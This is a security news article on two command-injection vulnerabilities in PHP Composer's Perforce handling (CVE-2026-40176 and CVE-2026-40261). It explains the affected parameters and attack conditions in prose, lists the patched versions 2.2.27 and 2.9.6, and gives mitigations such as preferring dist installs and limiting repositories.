Supply Chain Sabotage: The Critical RCE Flaws Lurking in PHP Composer

In the PHP ecosystem, Composer is the undisputed heavy hitter for dependency management, responsible for orchestrating the libraries that power millions of applications. However, security researchers have recently identified two significant vulnerabilities in how Composer interacts with Perforce repositories—flaws that could turn a routine composer install into a full system compromise.

The vulnerabilities, which allow for Remote Command Injection, strike at both the local project level and the broader supply chain.

The first vulnerability, tracked as CVE-2026-40176 (CVSS score of 7.8), involves an oversight in the Perforce::generateP4Command() method. This method was found to construct shell commands by interpolating user-supplied connection parameters—such as the port, user, and client—without proper escaping.

An attacker can exploit this by controlling the repository configuration within a malicious composer.json file. If a developer runs Composer commands on an untrusted project containing these malicious values, arbitrary commands could be executed in the context of their user account.

Crucially, this specific flaw is restricted to the root composer.json or the global composer config; it cannot be triggered by dependencies deeper in the project tree.

While the first flaw requires a malicious local file, the second vulnerability (CVE-2026-40261) is significantly more dangerous, carrying a CVSS score of 8.8. This flaw also targets the Perforce::generateP4Command() method but focuses on the source reference and source URL parameters.

This vulnerability can be exploited through any compromised or malicious Composer repository. A malicious repository can serve metadata that declares Perforce as a source type, embedding shell metacharacters directly into the source reference or URL.

The attack is particularly potent because it does not require Perforce to be installed on the victim’s machine; Composer will still attempt to execute the malformed command. Users are primarily at risk when installing or updating dependencies from source, often triggered by the –prefer-source flag.

The maintainers of Composer have released urgent patches to address these injection vectors. Organizations should immediately upgrade to Composer 2.2.27 (for 2.2 LTS) or Composer 2.9.6 (for the mainline branch). These versions include proper escaping for the generateP4Command() method, effectively closing the injection window.

If an immediate upgrade is not possible, security teams are advised to implement the following safeguards:

• Prefer Distributions: Avoid installing dependencies from source by using the –prefer-dist flag or adjusting the preferred-install: dist configuration setting.
• Trust but Verify: Only run Composer commands on projects from trusted sources and carefully inspect composer.json files for suspicious Perforce-related fields.
• Limit Repositories: Strictly limit your environment to known, trusted Composer repositories.